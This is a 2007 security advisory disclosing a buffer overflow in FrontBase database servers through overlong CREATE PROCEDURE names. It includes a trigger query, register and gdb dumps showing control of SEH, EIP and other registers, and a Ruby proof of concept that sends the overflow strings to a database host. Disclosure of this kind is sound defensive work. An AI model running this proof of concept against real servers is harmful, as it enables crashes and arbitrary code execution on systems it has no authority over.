-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
******************** Netragard, L.L.C Advisory* *******************
Strategic Reconnaissance Team
------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."
[Advisory Information]
- -----------------------------------------------------------------------
Contact : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070316
Product Name : FrontBase Relational Database Server
Product Version : <= FrontBase 4.2.7 (All Platforms)
Vendor Name : FrontBase, Inc.
Type of Vulnerability : Remote Buffer Overflow
Effort : Easy
[POSTING NOTICE]
- -----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.
<a href=http://www.netragard.com/html/recent_research.html>
Netragard Research
</a>
[About Netragard]
- -----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products,
Security Appliances, Network Appliances, and Web Applications commonly
found in businesses internationally. We apply the knowledge gained by
performing this research to our professional security services. This
in turn enables us to produce high quality deliverables that are the
product of talented security professionals and not those of automated
scanners and tools. This advisory is the product of research done by
the Strategic Reconnaissance Team.
[Product Description]
- -----------------------------------------------------------------------
"FrontBase is the only enterprise level relational database server that
was created in the Internet age, by Internet professionals specifically
to meet and exceed the demands of today's new economy."
- -- http://www.frontbase.com/ --
[Technical Summary]
- -----------------------------------------------------------------------
Any user with access to the FrontBase SQL command prompt and sufficient
privileges to create a stored procedure may be able to exploit a buffer
overflow condition in the parsing of 'CREATE PROCEDURE' SQL requests.
Successful exploitation may result in arbitrary code execution or a
denial of service condition.
[Technical Details]
- -----------------------------------------------------------------------
An exploitable vulnerability exists in FrontBase that can be used to
gain NT AUTHORITYSYSTEM or root privileges on an affected system. This
vulnerability exists within the creation Stored Procedures. If a user
creates a procedure with a very long name FrontBase will crash due to
memory
corruption. Memory can be corrupted in such a way that an attacker can
run arbitrary code.
The following example buffer can be used to trigger the vulnerability:
create procedure
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
....
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"()
begin
end;
Upon parsing the final ';' in the statement the database will trigger an
exception and crash.
Example:
FrontBase currently runs on the following variety of platforms:
Mac OS X Server 10.x
Mac OS X Server 1.2
RedHat
SuSE
YellowDog Linux
Debian Linux
Mandrake Linux
FreeBSD
Solaris
HP-UX
Windows Windows NT
Windows 2000
Below are a few examples of debugger output which highlight the bug.
On the windows Platform one of two things are possible. First we can
overwrite the SEH Handler with an address of our choosing. Because we
also overwrite EDI when we smash the SEH we will trigger an exception.
This enables us to inject a malicious exception handler.
EAX 00000000
ECX FFFFFFFF
EDX 01863214
EBX 01863484
ESP 0196F344
EBP 018666D8
ESI 01863E0C
EDI 41414141
EIP 0043BE6D FrontBas.0043BE6D
SEH chain of thread 00000D3C
Address SE handler
0196FFA4 04030201
The other option on windows is to simply overwrite the EIP address.
This method may not be as straight forward due to limited register
control. It may be possible to jump into ESP and make use of a small
7 byte buffer as leverage to reach the attackers shellcode of choice.
EAX 01863E0C
ECX 0099FD30
EDX 0099FD30
EBX 00000121
ESP 0196F480
EBP 00000000
ESI 01863484
EDI 018666A4
EIP 44434241
0196F478 41414141
0196F47C 44434241
0196F480 04030201 <---- Value at ESP (4 bytes)
0196F484 5F070605 <---- Value at ESP (3 bytes)
Under OSX we appear to smash the saved return address and its accompanying
frame. We also seem to have some control over the first frame as well.
k-s-computer-:/Users/kf root# gdb /Library/FrontBase/bin/FrontBase -q
Reading symbols for shared libraries .... done
(gdb) r newDB
Starting program: /Library/FrontBase/bin/FrontBase newDB
Reading symbols for shared libraries . done
2007-03-12 12:01:25 License problem detected:
Using the unlicensed FREE version options
2007-03-12 12:01:25 FrontBase Server - 4.2.7 on Mac OS X [Server]
2007-03-12 12:01:25 Transaction Log disabled
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x44434335
[Switching to process 2468 thread 0x2003]
0x000c6688 in ?? ()
(gdb) bt
#0 0x000c6688 in ?? ()
#1 0x41414141 in ?? ()
(gdb) x/i $eip
0xc6688: mov %edx,244(%eax)
(gdb) i r
eax 0x44434241 1145258561
ecx 0x0 0
edx 0x486690 4744848
ebx 0x4886d0 4753104
esp 0xb02f3290 0xb02f3290
ebp 0xb02f32d8 0xb02f32d8
esi 0x44434241 1145258561
edi 0xb02f3334 -1339083980
eip 0xc6688 0xc6688
eflags 0x10286 66182
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x37 55
(gdb) i f
Stack level 0, frame at 0xb02f3294:
eip = 0xc6688; saved eip 0x41414141
called by frame at 0x41414149
Arglist at 0xb02f328c, args:
Locals at 0xb02f328c, Previous frame's sp is 0xb02f3294
Saved registers:
ebp at 0xb02f328c, eip at 0xb02f3290
(gdb) frame 1
#1 0x41414141 in ?? ()
(gdb) i r
eax 0x44434241 1145258561
ecx 0x0 0
edx 0x486690 4744848
ebx 0x4886d0 4753104
esp 0xb02f3294 0xb02f3294
ebp 0x41414141 0x41414141
esi 0x44434241 1145258561
edi 0xb02f3334 -1339083980
eip 0x41414141 0x41414141
eflags 0x10286 66182
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x37 55
[Proof Of Concept]
- -----------------------------------------------------------------------
#!/usr/bin/ruby
require "frontbase"
connection = FBSQL_Connect.connect("192.168.0.6", -1, "newDB",
"_system", "", "", "")
# Windows XP Sp2 - SEH hit.
b00m = 'create procedure "' + 'A'*3115 + "x01x02x03x04" + '"() ' +
'begin ' + 'end;'
# Windows XP Sp2 - EIP hit and control of data at ESP.
# b00m = 'create procedure "' + 'A'*255 + "ABCD" +
"x01x02x03x04x05x06x07" + '"() ' + 'begin ' + 'end;'
# OSX 10.4.8 control of EAX and ESI in frame 0, control of EAX EBP ESI
and EIP in frame 1
# b00m = 'create procedure "' + 'A'*291 + "0123" + "ABCD" + '"() ' +
'begin ' + 'end;' # OSX - x86
connection.exec(b00m)
[Vendor Status]
- -----------------------------------------------------------------------
Vendor Notified on 03/08/07
Vendor Patched on 03/09/07
Vendor has stated the following:
Thx. for the report, the bug has been fixed and the fix will be in the
next general release. An error like this will be generated: Syntax error
005. The length of a regular identifier is not to exceed 128 characters.
Exception 363 (40:000). Transaction rollback.
[Disclaimer]
- ----------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.
<a href="http://www.netragard.com>
http://www.netragard.com
</a>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)
iD8DBQFF+wHiQwbn1P9Iaa0RAiJ3AJ4jAGglza+4PuH5P1PF3z2ebpZ/GgCbBxSs
2gpgltsr3ugv8xi52xj7cx4=
=c9QZ
-----END PGP SIGNATURE-----